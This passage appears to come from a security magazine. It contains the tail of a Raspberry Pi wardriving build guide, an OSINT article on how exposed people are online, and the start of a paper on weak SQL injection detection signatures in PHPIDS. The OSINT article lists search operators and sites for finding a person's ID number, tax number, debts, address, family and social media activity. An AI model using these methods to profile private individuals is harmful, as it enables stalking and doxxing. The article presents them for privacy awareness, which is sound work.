hardware and Open Source software, a wardriving rig can be readily built.
The unit built will form an essential part of a pentester’s kit. Furthermore, it can help address the various pitfalls
associated with other methods of Wi-Fi discovery and Wireless Intrusion detection systems.
156
Wardriving, rebooted and updated, part 1, let’s get started!
Appendices
There are several prominent tools and utilities that are most useful for the creation, setup, configuration, maintenance
and operation of the unit. It is left to the reader, as required, to select preferences for any additional software, these
are just suggestions!
As much as has been possible, the software here is cross/multi-platform, i.e. Windows, Linux and MacOS compatible.
balenaEtcher
balenaEtcher has become the de facto utility for “flashing” images to storage devices (USB and micro SD card are
supported). It is simple to use, Open Source and available as a download for Windows, macOS and Linux.
Micro SD formatter
This utility is provided by the SD Association (SDA), with the (claimed) capability to "optimally" format
SD/SDHC/SDXC Cards, potentially increasing performance! Furthermore, it fully complies with the SD File System
Specification created by the SD Association (SDA).
Putty
PuTTY is an SSH and telnet client, developed originally by Simon Tatham and supported by a group of volunteers.
Available for the Windows platform and also Linux (there is also a version for MacOS). PuTTY is open source software
that is available with source code.
Putty is most useful after enabling ssh on the Raspberry Pi, allowing shell/console access to the Raspberry Pi.
WinSCP
WinSCP is an award winning and popular SFTP client and FTP client for Microsoft Windows. Utilising a "file
manager" style interface, copying files between computers/servers is straightforward and intuitive. Other protocols
supported include FTP, FTPS, SCP, SFTP, WebDAV or S3.
157
Wardriving, rebooted and updated, part 1, let’s get started!
Synergy by Symless
Synergy is software that shares one mouse and one keyboard between multiple computers. Copy ‘n’ paste between
connected computers is also possible. One computer is configured as the server, other computers have a client that
connects via the network, so no additional hardware is required. Synergy works on Windows, macOS, Linux, and
Raspberry Pi.
Synergy is a “quality of life” enhancement whilst creating the unit, especially the copy ‘n’ paste feature!
Db browser for SQLite is a well-established (since 2003) database browser. It is available for Windows, MacOS and
Linux. Furthermore, there is a “portable” version for Windows, which negates the need to install the application.
Using DB Browser for SQLite makes access to the various logs and data within the Kismet database file
straightforward.
https://sqlitebrowser.org/blog/portableapp-for-3-11-2-release-now-available/
The following table shows all of the major releases for Kismet so far in 2019.
Release
Version Date tar ball download Notes
2019-09- 1 September https://www.kismetwireless.net/code/ https://www.kismetwireless.net/
R1 2019 kismet-2019-09-R1.tar.xz development/release/release-20190901/
158
Wardriving, rebooted and updated, part 1, let’s get started!
N.B. A comprehensive list of old releases, complete with download links can be found at
https://github.com/kismetwireless/kismet/releases
Additionally, to extract/download a specific version from github, in this example, the 2019-08-R2 the following
command line can be used:
To determine the actual version number to use, query the git database from within a cloned repository:
git branch -a
• Github - https://github.com/kismetwireless/kismet.git
159
Wardriving, rebooted and updated, part 1, let’s get started!
Several power measurements were taken, the primary use for these measurements is to ensure that a suitable power
source is used whilst the unit is in operation, in the field. Furthermore, an estimation can be made for persistence of
the power source, although, “real world” usage will provide the actual amount of time the unit will operate before the
power source stops being able to provide sufficient power for correct operation of the unit.
For the purposes of measuring current, the unit can be subdivided into three main components, with current
measurements taken for each of the components:
1. Raspberry Pi 4
In addition to the above, each Wi-Fi adapter was isolated. Furthermore, there were two configurations used, with
either:
1. Panda PAU09
2. AWUS036ACH
To provide a far clearer understanding of current usage, graphs have been plotted for configurations using either the
Panda PAU09 or AWUS036ACH Wi-Fi adapters.
a. PAU09 1393 mA
b. AWUS 1314 mA
2. Serial GPS device drawing current from power on, for both configurations, similar levels, approximately 57 mA
– 58 mA
4. When starting Kismet, the Panda PAU09 Wi-Fi adapter is stopped, put into monitor mode, then restarted
5. Differences, from a current usage perspective, of how the two Wi-Fi adapter drivers operate
160
Wardriving, rebooted and updated, part 1, let’s get started!
Interestingly, there is very little difference from a “stable state” current usage perspective, between the two Wi-Fi
adaptors used, just 32mA in practice. “Stable state” being the point where the operating system has fully booted with
drivers loaded, Kismet running, etc., the main hardware components are all attached, for example, the Wi-Fi adaptor,
serial GPS module and external active antenna.
Furthermore, a difference can be seen with respect to how the Wi-Fi adaptor drivers work. The AWUS036ACH driver
operates in the same way as the PAU09 driver. Also, the way that Kismet interacts with the PAU09 driver is very
different.
It can be clearly determined that Kismet disables and, as can be seen in the chart above, pushes the PAU09 into a
lower power mode. Then it enables monitor mode, then re-enables the PAU09. This does not occur with the
AWUS036ACH.
For the AWUS039ACH, once Kismet starts, the power consumption is reduced at regular time intervals, most likely
this is some consequence of the channel switching configuration of Kismet.
The table below shows total peak and “stable state” current consumption.
161
Wardriving, rebooted and updated, part 1, let’s get started!
PAU09 AWUS036AC
H
Peak current (all components) in mA 1393 1314
Average stable state current (all components) in mA 884 916
162
Wardriving, rebooted and updated, part 1, let’s get started!
Objective
Whilst manufacturers’ specifications do serve as a guide, it is frequently necessary to carry out speed and performance
tests of micro SD cards and, if used, external storage devices.
Another useful source of speed and performance tests is the wealth of published tests. These are useful for indicative
purposes, however, either may not cover a specific make/model of micro SD cards, external storage devices, the guides
may just be outdated, some of the online guides use outdated versions of the test software/applications.
Some relevant and representative, performance results and guides can be found at the following;
• https://www.pidramble.com/wiki/benchmarks/microsd-cards
• https://www.jeffgeerling.com/blogs/jeff-geerling/raspberry-pi-microsd-card
Methodology
The methodology used here is to use hdparm, dd and IOzone. This follows the methodology that is used in the
PiRamble script
(https://raw.githubusercontent.com/geerlingguy/raspberry-pi-dramble/master/setup/benchmarks/microsd-benchm
arks.sh). Furthermore, this guide does use a newer version of IOzone (compared to the PiRamble script). Additionally,
it is beneficial to be able to run the tests individually, for example, this may allow the reader to run a single test
multiple times to get an average, peak and minimum indication of performance.
• Initially carried out whilst the Raspberry Pi is NOT under CPU load
• Also, NOT whilst the unit is in operation, i.e. NOT running Kismet live
163
Wardriving, rebooted and updated, part 1, let’s get started!
• Random read/write – Specifically for Raspbian and Linux systems a standard and accepted tool for random
read write tests is IOzone
N.B. It is NOT recommended to run these tests whilst using the unit operationally, in a live
environment!
This guide will detail how to use the tools individually, although of course the PiRamble test script can be used, with its
associated limitations.
To test the micro SD card used for booting the Raspberry Pi typically references this device:
/dev/mmcblk0
N.B. The above references the entire micro SD card, i.e. NOT individual partitions.
The screenshot below shows a listing for the entire micro SD card, together with partition 1 (last two characters p1)
that contains /boot a FAT32 partition and partition 2 (last 2 characters p2).
However, if a different storage medium is used, for example, a USB memory stick or external hard drive, the path for
that device can be used in place of the micro SD card.
hdparm - hdparm, named using the abbreviation of "hard disk parameter", is a command line program for Linux that
can, amongst many functions, gather performance statistics. Other functionality of hdparm is the ability to set drive
caches, sleep mode, power management, acoustic management, and DMA settings. There is a danger inherent with
this, insofar as, with certain settings, it can crash the system, render the storage inaccessible, and cause complete data
loss! ONLY use hdparm settings that are fully understood!
To use hdparm individually, assuming the PiRamble script has NOT be run. Update and upgrade from the repositories
if required!
Install hdparm:
164
Wardriving, rebooted and updated, part 1, let’s get started!
Run hdparm:
The following results show the tested micro SD card has 42.69 MB/sec, which is within limits:
dd - dd is a standard Linux and Unix command that has a primary function to copy and convert files. Typically, it is
installed by default and with Raspbian there is no requirement to install dd. For this guide, dd will be used to transfer
from /dev/zero to a file in the home directory. The file will then be deleted.
IOzone - IOzone ( http://www.iozone.org/ ) is a very popular filesystem benchmarking tool. In fact, with v3.487, there
are 62 supported platforms. IOzone has the capability to carry out an extensive filesystem analysis of a given computer
system. The benchmarking tests file I/O performance for the following operations; read, write, re-read, re-write, read
backwards, read strided, fread, fwrite, random read, pread, mmap, aio_read, aio_write. Additionally, IOzone can be
run to output in a format that is compatible with popular spreadsheet applications so that in depth analysis of
filesystem performance can be readily carried out!
This guide will use the latest stable source code. As of September 2019, the latest version of IOzone is v3.487. The
PiRamble script uses v3.43.
Download the v3.487 source code for IOzone to the home sub directory on the Raspberry Pi:
cd ~
wget http://www.iozone.org/src/current/iozone3_487.tar
165
Wardriving, rebooted and updated, part 1, let’s get started!
cd iozone3_487/src/current/
To establish the correct compile option, use make to show the list of supported platforms, this step is optional:
The binaries for IOzone are now in this sub-directory, IOzone can be run from this location or copied to a filesystem
location if testing a different storage device, for example, a USB memory stick.
To use IOzone to evaluate the SD card performance, use the following command line options:
./iozone -e -I -a -s 100M -r 4k -i 0 -i 1 -i 2
The above screenshot shows random read – 9591 or 9.591 MB/s and random write – 4472 or 4.472 MB/s speeds of the
micro SD card.
166
Wardriving, rebooted and updated, part 1, let’s get started!
The AWUS036ACH is a high powered Wi-Fi USB adapter. When the adapter case is opened, there is a small switch
(see the photo, with the switch highlighted in red). This switch controls the power and sensitivity. Normal power is
under 20dBm, for high power, see the table below.
167
Wardriving, rebooted and updated, part 1, let’s get started!
168
Wardriving, rebooted and updated, part 1, let’s get started!
Antenna specification
The recommended antennas for this unit are the excellent Printed Circuit Board (PCB) antenna designed and
manufactured by Kent Britain. These antennas are very efficient for 2.4GHz and 5GHz, the frequencies of interest,
omni-directional, small and very discrete!
The datasheet provides full details for connectivity, directional sensitivity and performance.
169
Wardriving, rebooted and updated, part 1, let’s get started!
The GPS module needs to be connected “electrically” to the Raspberry Pi. This is a straightforward process and
depending on how the GPS module is “packaged” will determine whether the GPS module will require any soldering.
The complete Raspbian configuration and software installation is detailed above, in summary it consists of:
• Enabling the serial interface on the Raspberry Pi for the GPS module to use
• Configuring gpsd
Only four connections are required from the GPS module to the Raspberry Pi:
• GND/ground – Connect to GPIO header pin 6, 9 or 14. These pins are specified due to their close proximity to
the TX and RX pins. Other ground pins are available at pins 20, 25, 30, 34 and 39. “Electrically” they are all
equivalent
• TXD/Transmit data - Connect to GPIO header pin 10, this is the RXD/transmit data on the Raspberry Pi, the
connection is “crossed over”, i.e. RXD – TXD
• RXD/Receive data - Connect to GPIO header pin 8, this is the TXD/transmit data on the Raspberry Pi, the
connection is “crossed over”, i.e. RXD – TXD
It is recommended that an external active antenna is used. The NEO-6M (the GPS module used in this guide) has a
U.FL connection, the majority of external active antennas use an SMA connector, therefore a U.FL to SMA
adapter/pigtail is used.
N.B. The U.FL connector is very small, 3.0 mm by 3.1 mm and 2.5 mm height. Not only is the
connector very fragile and easily broken, the U.FL connector is not rated for numerous insert/remove
connections. USE EXTREME CARE WITH THIS!
170
Wardriving, rebooted and updated, part 1, let’s get started!
GPS profiling
GPS profiling is a very useful exercise to carry out, for both diagnostic as well as performance analysis, to give a better
understanding of the “GPS chain”. The “GPS chain” being all components used, specifically, GPS module, external
antenna (if used), associated cables and connectors. As an example, a powered GPS antenna, an “active antenna”, is
commonly used, however, if the cable is very long, and not of high quality, it is feasible that the voltage sent from the
GPS unit, typically 3.3v, is not necessarily the voltage at the active element of the GPS antenna, this will impact
directly the gain of the active antenna. Furthermore, the concept used in active antennas is to have RF amplification as
close as possible to the antenna, increasing the overall Signal to Noise Ratio (SNR), again, if the cables are of poor
quality and/or very long, the benefit of increased SNR may be reduced, in extreme circumstances, introducing noise
and distortion to the GPS signal, therefore reducing the effectiveness of the overall “GPS chain”.
To carry out GPS profiling, the following are the main variables that will impact the effectiveness of the GPS profiling:
• The antenna of the GPS module must have a clear view of the sky
• If the antenna has a cable, ensure that the cable is of high quality and as short as possible
• gpsprof – This is installed as part of the python-gps package, which is installed as a dependency with
gpsclients. Whilst a lot of the “online” information for gpsprof is inaccurate or outdated, a good resource is the
man page that can be found at http://manpages.ubuntu.com/manpages/bionic/man1/gpsprof.1.html.
171
Wardriving, rebooted and updated, part 1, let’s get started!
• gnuplot – This has not been installed so far in this guide, so will need to be installed. The gnuplot www page is
http://www.gnuplot.info/.
N.B. If using a u-blox GPS module, which this guide does, there is a Windows-based software
provided by u-blox, at no cost, for GNSS evaluation. This software is called u-center and is available
from https://www.u-blox.com/en/product/u-center .
u-center is a very comprehensive suite of software, however, the GPS module has to be connected via
a USB to serial adapter, therefore the GPS module and complete “GPS chain” is NOT evaluated, i.e.
NOT using gpsd and NOT tested “in situ”.
u-center operation is considered “out of scope” for this guide and will not be detailed in this article,
however, for readers who use Windows, u-center is a worthy software application to be familiar with.
The profiling method can be run on all of the versions of Raspbian specified in this guide, however, for Raspbian Lite,
as there is no desktop, an image is generated that can then be transferred.
Install gnuplot:
172
Wardriving, rebooted and updated, part 1, let’s get started!
173
How Exposed
Are We On the
Internet?
Carlos Loyo
Emiliano Piscitelli
Carlos Loyo
Computing.
Contact: [email protected]
175
ABOUT THE AUTHOR
Emiliano Piscitelli
Contact: [email protected]
176
ABOUT THE AUTHOR
Contact: [email protected]
177
How Exposed Are We On the Internet?
There is no question that the Internet has become both a basic need for people and companies that can even be
equated on many occasions with services such as electricity, water or gas. A sample of this can be the companies that
are limited to carrying out their tasks normally or the massive comments on social networks when there are
inconveniences in the connections. Currently, many of us use several services on the Internet, in some of them it is
very likely that we will upload information such as: places visited, personal photos, comments related to religious or
political affiliations, tastes, hobbies, among others; which can be taken advantage of and used by third parties (people
or companies) in order to conduct targeted advertisements, investigate our profile and that of our environment, or
induce propaganda, among others.
OBJECTIVE?
Before moving forward, it is very important to know the concept of OSINT (Open Source Intelligence). This refers to
obtaining information from open sources (publicly accessible without requiring prior authorization) that will be
analyzed and can then be used for different purposes such as:
• Public safety
• Threat monitoring
• Corporate research
• Executive Protection
• Business reputation
• Fraud analysis
• Financial security
• Competitive intelligence
• Marketing
And some of the sources from which this information is commonly obtained are:
178
How Exposed Are We On the Internet?
• Government Information
Today there are different techniques and tools that are used both by government agencies, in pursuit of investigations
and crime prevention, as well as by private companies with other objectives.
Whether the objective is a person or a company, it will be sought to obtain as much information as possible from it.
As an example, here is a list that will give you an idea of the type and depth of information that can be obtained from a
person:
• Habits
• Tastes
• Religion
• Sexual tendency
• Political trend
• Workplace
• Sports
• Usual routes
• Places visited
• Travels
179
How Exposed Are We On the Internet?
• Vehicles
• Technology used
As you can see, this type of information is somewhat sensitive and carries a latent danger since it could be used for
criminal purposes.
• How much information about my family, my friends and mine is publicly available?
Since there is no direct way to access all Internet sites, it is difficult to know 100% of all public information that can
help answer these questions, but with the procedures that we will detail below, we can have a great approach. For this
we will rely on the flows of Michael Bazzell (international reference in OSINT), based on searches by real name,
alias, mail, telephone and domain.
Real Name
A simple way to start knowing what data may be published about a user is based on the real name of the user: name
and surname (See Image 1). Having as a search entry a name and surname, you can perform the following searches:
● Identity Document
● Phone number
● Family data
○ Network Validation
180
How Exposed Are We On the Internet?
Image 1 Search flow starting from a person's first and last name
a) Identity Document:
To identify a person's Identity Document, you can search using engines such as Google, Bing and Yandex. Normally,
people only use Google because of its popularity, but a good analyst cannot be limited to a single search engine since,
as it is publicly known, Google does not index all the Internet, so when we want to know much of the information
related to companies or people, it is important to combine data identification using other engines, such as Bing
(https://www.bing.com/) or Yandex (https://yandex.com/), since they have other operators and also index the
information in different ways. Therefore, as a recommendation, you must enter the real name in at least two search
engines and subsequently validate the results. In the case of Identity Document, operators can be combined as:
“person_name” dni
181
How Exposed Are We On the Internet?
Note: In Argentina the identity document is called “Documento Nacional de Identidad” (National Identity
Document) or DNI. Another document could be the "cédula de identidad" (identity card)
As you will see, depending on the region, the searches can be combined between words and domains. At the same
time, depending on the location, and with the aim of comparing the results, other domains can be used, for example:
Google Mexico www.google.com.mx, in case the person is related to that Country.
In conclusion, the searches to be performed are quite broad and only limited to the imagination of the analyst.
b) Fiscal Document:
If you want to identify the tax document number (in the case of Argentina, it is called CUIL or CUIT depending on the
type of tax record), you can combine search engines as in the previous example:
“person_name” “CUIL”
In the case of Argentina, there are search sites such as: https://www.dateas.com/es, https://www.nosis.com/es or
http://www.buscardatos.com. If you do not want to perform the search in the website, it can be done using the search
engines combined with the different operators. For example:
c) Public Debts:
To analyze debts related to a person through public sources, the portals legally permitted by the government of the
country related to it must be identified before starting the data collection. In the case of Argentina, payment debts can
be verified according to patent or domain “license plate number” or identity document. Other data that is publicly
possible to obtain is related to the credit situation of the person: loans, returned checks and expenses on credit cards.
To identify patent debts and infringements, you can analyze sites like:
➡ http://www3.arba.gov.ar/AvisoDeudas/?imp=1
➡ https://lb.agip.gob.ar/ConsultaPat/
➡ https://consultainfracciones.seguridadvial.gob.ar/consulta/
182
How Exposed Are We On the Internet?
➡ http://www.buenosaires.gob.ar/consulta-de-infracciones
➡ https://www.infraccionesba.net/
(These are examples for the Argentina region, but can be applied in other countries/cities depending on local
services.)
If we want to know the credit situation from an identity document related to a person, a site to consult is:
➡ http://www.bcra.gob.ar/BCRAyVos/Situacion_Crediticia.asp
d) Possible Address:
In case you want to verify from the name of a person if it is feasible to obtain the address of his or her home, work or
summer house, you can combine search operators like the ones we saw earlier using the word address or any related
one. Another way is to validate against consultation sites, in the case of Argentina, it can be the following:
➡ https://www.telexplorer.com.ar (in the portal telexplorer.com.ar, you can obtain from the name of a person
and its possible city, the address of the same)
e) Telephone Number:
If you want to identify phone numbers from a person's name, you can search in the white or yellow pages, an example
of this could be:
Also as in previous cases, we can combine through search operators in different search engines.
f) Family data:
In order to get public information about a person's family, it can be analyzed through their social networks (as we will
see later) or through direct reference portals, especially those related to family trees. For example:
➡ https://www.genealogy.com/
➡ https://www.familysearch.org/hr/search/
➡ https://www.ancestry.com/search/
183
How Exposed Are We On the Internet?
Note: Always remember, for indirect searches, establish search operators and look at the results in cache.
g) Social Networks:
The first thing we are going to use are the so-called "people finders", an example of this is the website:
➡ https://pipl.com
In which the real name of the person must be entered, and as an additional filter, the location of the person, where
possible social, labor networks and publications are subsequently obtained.
➡ https://www.fastpeoplesearch.com
➡ https://www.spokeo.com
In case you want to know data published on social networks “without being friends”, initially, from a browser that does
not have a user logged in, you can enter the real name of the person in the search bar (of the social network site) and
once located, it is possible to check if information such as: photos, friends, places, comments or public groups that can
be reached by outsiders is displayed. On the other hand, if you wish to know the data referenced by the same user or
satellite users, before performing the search, you must obtain the identifier “ID” of the social network to be
analyzed.
To explain this procedure we will rely on the most used social network, Facebook:
• First of all, we must obtain the URL of the account, which is composed of
https://www.facebook.com/[username]
• Afterward, the translation of the URL to the ID must be done through portals such as https://lookup-id.com.
• Finally, in a browser that does not have an active Facebook login, in https://stalkscan.com/, you can check
your own account, and with https://sowdust.github.io/fb-search/ you can analyze the ID obtained in the
previous step.
For analysis of Facebook (besides the Michael Bazzel’s web portal), the results can be validated in sites like:
➡ http://www.uk-osint.net/facebook.html
184
How Exposed Are We On the Internet?
Image 2: StalkFace is a web portal that allows you to analyze and filter data from an account to be monitored on Facebook
The procedure explained above is similar for the social network Twitter, where initially we must obtain the URL of the
account and the ID. If you want to analyze the account information through websites, you can use the following sites:
➡ http://www.twimemachine.com/user/username
185
How Exposed Are We On the Internet?
From the latter, all publications can be identified in a flat format, similar to a txt file.
In the case of Instagram, you can search by tags through: https://www.instagram.com/explore/tags/[name], where
you will get the photos that have the reference to the tag, being able to locate satellite user references.
Alias
If you want to validate much of the public information available on the Internet through our nickname or alias (See
Image 4), having a nickname as a search entry, you can perform the following searches:
186
How Exposed Are We On the Internet?
One way to check if an alias "nick" is related in different social networks is to validate it on sites such as:
➡ https://pipl.com/
https://namechk.com/ (See Image 5) (on this site, the alias of the account is entered in the search field where the
active social networks with the alias entered will be shown at the bottom of the page in gray).
➡ https://knowem.com/
187
How Exposed Are We On the Internet?
Image 5: Analysis with the namecheck portal to identify social networks from an alias
If we know an alias, a simple way to validate it is combining alias@domain (for example gmail, hotmail, etc.).
Once the email is located, you can search for possible leaks at https://haveibeenpwned.com. This search, beyond the
possible leaks allows us to identify social networks linked to an email.
In the case of search engines (as already known), different combinations of operators can be used (it is important to
validate in more than one) as well as meta search engines that process results from traditional search engines, some
examples are available:
➡ https://searx.me/ (This metasearch engine allows you to export the results in json and csv format, obtaining
its results from Google, Bing and Wikipedia).
➡ http://yippy.com/ (using Yippy we can see how the results are ordered in a hierarchical folder structure).
Analysis tools
On many occasions, we need to work with high volumes of information and generally we have little time, so obtaining
results through a manual procedure becomes unproductive and cumbersome. It is this occasion where we can rely on
tools that help us carry large searches with open sources and automate different tasks.
188
How Exposed Are We On the Internet?
• Maltego (to expand searches in social networks, it is recommended to implement the SociaLinks API
https://mtg-bi.com) (See Image 6)
• NIFI Apache
• Tinfoleak
• Shodan
Image 6: Use of the SocialLinks transform for analysis of multiple Facebook accounts through Maltego
So far we could see that there is a lot of public information and although part of it does not depend directly on us that
is exposed, another it does, so below we will present some tips to protect our privacy and thus raise the security
threshold:
189
How Exposed Are We On the Internet?
Exposure in social networks: When we treat privacy in social networks we like to make an analogy with the
physical world and give two very simple tips:
1. Never write something on a social network that you would not say in front of a microphone in the presence
of thousands of people you do not know.
2. Never upload a photo or video to a social network that you would not exhibit on a giant screen inside a
football stadium.
Metadata: It is very common to share information with our friends, co-workers or clients. While this action (with due
care) does not represent a vulnerability in itself, the data that is generated and associated with most of the documents
we create (.doc, .xls, .ppt, .pdf, .jpg, .png, etc.) it may be used to gather information that we do not want to provide.
This data is known as metadata (data about the data) and can be used against us. If they are not controlled correctly,
they could represent an important information leak, both for our company and for our private life.
To avoid this, we can carry out different actions. Among them, configure the tool we use (as long as you have this
option) so that it does not save the metadata. We can also use tools for the analysis and deletion of metadata, such as
Exiftool (http://sourceforge.net/projects/exiftool) or external services that control and help us keep our files without
metadata, such as Metashield Protector
(https://www.elevenpaths.com/es/tecnologia/metashield/metashield-clean-up-online/index.html).
Geolocation: Nowadays, it is very common that both applications and websites, suggest we activate our geolocation
in order to obtain “a better experience”. The problem arises when this geolocation is exposed and accessed by any user,
for example, on Twitter it is very easy to obtain the exact location of each tweet that a user generates (as long as it has
this functionality activated). It may seem harmless to the naked eye, but what happens if, when analyzing these
positions, we can deduce the address of a person's house? Surely we will not want to have that “best experience” and
immediately deactivate the geolocation, right?
Privacy settings: It is very important to check our privacy in each and every one of the applications we use as well as
in the different services. For example, WhatsApp has the possibility to configure who can see (all, our contacts or
anyone) our state and states, our photo and our last connection (by default everyone can see this information). At first
sight, this does not seem to threaten our privacy, but what if someone could use tools that are constantly monitoring
all this information? And worse if it could be analyzed when we are sleeping based on the time we were not online,
now our privacy would be jeopardized.
Online services registration: Nowadays, it is very common for any online service to request our mail to be able to
register to it. Beyond trusting our information to the service in question, we would be adding the possibility of a
security breach, since in the case that the service suffers an attack (as many have already suffered), our data would be
exposed; if we add that many users use the same password for all (or almost all) their services, the criticality would be
even greater. That is why we recommend having an additional email account whose name has no direct relationship
with us (ex: [email protected]), in order to use it in the registry of different services.
190
How Exposed Are We On the Internet?
Registration in public events: Some time ago, we had to carry out a safety assessment of a company. When we
started with one of the first stages (information gathering), we were surprised to find, almost immediately, that the
corporate mail belonging to one of the employees had been used (by the same employee) to register for a drawing that
was being carried out in a supermarket. Next to this mail were data such as: name and surname, ID, address,
telephone (landline and cell phone). This information was publicly displayed on the (not very careful) site of the
marketing company that had made the draw. Incidentally, obtaining it cost us no more than an advanced Google
search.
It is advisable not to register for this type of promotion, but if you want to do it, it is convenient not to enter sensitive
data as well as to use email addresses as detailed in the previous point and never but never, the mail of our work.
Participation in forums: In some of our pentests, it was very easy to obtain information thanks to public forums.
In them we were able to obtain data on the objectives such as: operating systems, services, versions, users, security
policies and many more details. At this time you will be asking: how could you get so much information in a public
forum? The answer is simple: technical users of companies make very detailed and specific questions for problems in
implementations who used their corporate mail and even in many cases they signed with their name, surname,
position and telephone number.
There is no doubt that participating in forums and being able to help or be helped is very good, the problem arises
when there is much more information left there than just questions and answers.
Search yourself periodically: As we all know, the information found on the net grows second to second, which is
why a very good practice is to perform periodic searches of ourselves and that way we can have a general overview of
how exposed we are and, in case it’s necessary, act immediately if there is any information that could attempt to
violate our privacy.
To perform this task, you can use the step-by-step we discussed above as a base (Obtaining and analyzing information)
and gradually adding and feeding the searches and analysis of the information with other sources and tools.
CONCLUSIONS
As we could see throughout this article, there are many sources from which you can get information from ourselves, in
many cases it can threaten our privacy and in bad hands it can become very dangerous. It is true that we are not
always able to control what is published and what is not (government sites, bank details, etc.), but in others we can,
and it is there where we must focus and take into account that it is very important to know that this information exists
and only by raising awareness and raising awareness of our environment we can take care of our privacy and that of
those around us.
191
How Exposed Are We On the Internet?
LINKS OF INTEREST:
• OSINT LATAM GROUP: HTTPS://WWW.OSINTLATAMGROUP.COM
• OSINTFRAMEWORK: HTTP://OSINTFRAMEWORK.COM
• TINFOLEAK: HTTPS://TINFOLEAK.COM
• SHODAN: HTTPS://WWW.SHODAN.IO/
192
Identification of
Flaws in the
Design of
Signatures for
Intrusion
Detection Systems
Nancy Agarwal
Nancy Agarwal
194
ABOUT THE AUTHOR
195
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
Signature-based Intrusion Detection System (SIDS) provides a promising solution to the problem of web application
security. However, the performance of the system highly relies on the quality of the signatures designed to detect
attacks. A weak signature set may considerably cause an increase in the false alarm rate, making it impractical to
deploy the system. The objective of the paper is to identify the flaws in the signature structure responsible for reducing
the efficiency of the detection system. The article targets SQL injection signatures particularly. Initially, some essential
concepts of the domain of the attack that should be the focus of the developer in prior to designing the signatures have
been discussed. Afterwards, we conducted a case study on the well known PHPIDS tool for analyzing the quality of its
SQL signatures. Based on the analysis, we identify various flaws in the designing practice that yield inefficient
signatures. We divide the weak signatures into six categories, namely incomplete, irrelevant, semi-relevant,
susceptible, redundant and inconsistent signatures. Moreover, we quantify these weaknesses and define them
mathematically in terms of set theory. To the best of our knowledge, we have identified some novel signature design
issues. The paper will basically assist the signature developer in understanding what level of expertise is required for
devising a quality signature set and how a little ignorance may lead to deterioration in the performance of SIDS.
Furthermore, a security expert may evaluate the detector against the identified flaws by conducting structural analysis
on its signature set.
1. Introduction
The issue of securing a web application from the continuously growing malicious activities is in a state of flux1. The
increasing dependency on web applications for everyday activities, such as online banking, shopping, social
networking, etc., makes these applications a lucrative asset for the attackers. According to the latest security report
(the year 2017)2, there is a 35% increase in the number of web application attacks from the previous year. One more
study3 reports that 60% of cyber attacks either target the web applications or use them as a vector in the attack.
Intrusion Detection System (IDS) is one of the security solutions employed to safeguard web applications from cyber
attacks (Depren et al. 2005). The main objective of these systems is to recognize a suspicious client-request to the web
application. Anomaly-based detection and signature-based detection are the two common approaches used to build
these systems. The Anomaly-based IDS (AIDS) is first trained to learn the benign usage behaviour of the application
and then used to classify any deviation from the trained behaviour as an attempt to attack (Kruegel et al. 2003),
whereas the Signature-based IDS (SIDS) is provided with the patterns of known attacks in order to identify suspicious
activities (Almgren et al. 2000). The advantage of signature-based systems over AIDS is that they generate
comparatively lesser false positive rates whereas, on the downside, SIDS is not capable enough to detect unknown or
modified attacks. The performance of the signature-based systems is strongly affected by the quality of the signature
set (Kim et al. 2004; Yegneswaran et al. 2005). A weak signature set may result in significantly high false alerts, which
would make the IDS unfeasible to use.
196
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
Since these signatures are mostly created by a security expert, their quality has a strong dependency on the knowledge
extent of the expert about the attack domain, and how precisely the patterns of the attacks are captured and
implemented. Both incomplete knowledge of attack domain and flaws in implementing the detection rules will lead to
the formation of a poor quality signature set, which later on reduces the efficiency of SIDS.
Attackers have a list of vulnerabilities to exploit a website (Wichers 2013) and the domain of the attack vectors varies
significantly with the class of vulnerabilities. For instance, attack vectors targeting SQL vulnerability make use of SQL
elements and related operations (Morgan 2006), whereas XSS-based attack vectors mostly comprise elements of
HTML or JavaScript language (Spett 2005). The attackers have a number of ways to exploit a single vulnerability or
can even create an indefinite number of mutants of an attack vector (e.g. using whitespaces, special characters or
encoding techniques) to bypass an IDS. Therefore, it is necessary for a signature developer to have a sound technical
understanding of the respective vulnerability and its attack domain. However, acquiring sound knowledge about the
attack vectors would not be enough to build an efficient SIDS. The defined rules set equally plays a vital role for a
successful SIDS. If the signature set is not complete or the signature pattern is not implemented correctly, the system
may allow the attack vectors to penetrate into a web application. There is also a common trade-off between deciding
the sensitivity and specificity of a signature. A generic signature can be modeled to obtain greater detection coverage
and deal with the variations of attack vectors but it might affect the legitimate request traffic by mistakenly
categorizing them as attacks too often. Also, different precise signatures can be modeled to handle different forms of
attack vectors to reduce the false positives. But a specific signature would put the application security at stake by not
issuing an alert on the slightly modified attack vector.
In the article, we studied the structure of the signatures designed to detect SQL injection and have identified various
flaws made by the signature developers and lead to a poor quality signature set. SQL injection (SQLi) is one of the
attack classes that exploits the input validation vulnerability to perform unauthorized operations on the database
server of the web application (Clarke-Salt 2009). However, the flaws identified in the paper are not limited to SQLi
signatures but applies universally to any signature set designed to detect intrusions. The paper first discusses the
concepts of the attack domain and the SQL technology that must be known to the developer prior to designing the
signatures. It explains the relationships that exist among SQL attack vectors and signatures and highlights various
peculiar and finer details that might be ignored by the developer while analyzing and extracting patterns from the
attack vectors. Afterwards, we conducted an experiment on the PHPIDS tool, a PHP-based Intrusion Detection
System, in order to analyze the quality of the structure of the signatures particularly for detecting SQLi attacks. We
created a set of 415 attack vectors with five attacks vectors per signature (given in Appendix A). We used an
iMacros-based script 4 to automate the process of sending attack requests to the vulnerable web application hosted on
localhost. The quality is assessed on various parameters including evaluation of the contribution of the individual
signatures in the detector, sensitivity and specificity in the designed signatures and identifying the attack vectors that
can bypass the IDS. Based on the structural analysis, we identify various signature design issues that cause a poor
signature set even after proficient knowledge of the attack domain. Moreover, we quantify the flaws and describe them
mathematically in terms of set theory.
4 https://wiki.imacros.net/Tutorials
197
Identification of Flaws in the Design of Signatures for Intrusion Detection Systems
The mathematical definitions will help the security expert assess SIDS via conducting structural analysis from various
perspectives.
The contribution of the work is three-fold: (1) We discuss the key points to be focused on while attaining the
knowledge of SQL-based attack vectors in order to formulate efficient signatures. (2) We perform a case study where
we assess the structure of the signatures of the PHPIDS. (3) We reveal a number of pitfalls in the signature design and
describe them mathematically.
The paper is structured as follows: In section 2, the paper discusses the relevant work. In section 3, the paper talks
about the relationship between the signatures and attack domain of the SQL injection. Section 4 presents the case
study where an experiment is carried out to assess the quality of the signatures of the PHPIDS software. It is followed
by the section 5, which provides the description of design issues identified while studying the structure of PHPIDS
signatures. Finally, section 6 concludes the paper and also mentions the future direction.
2. Related Work
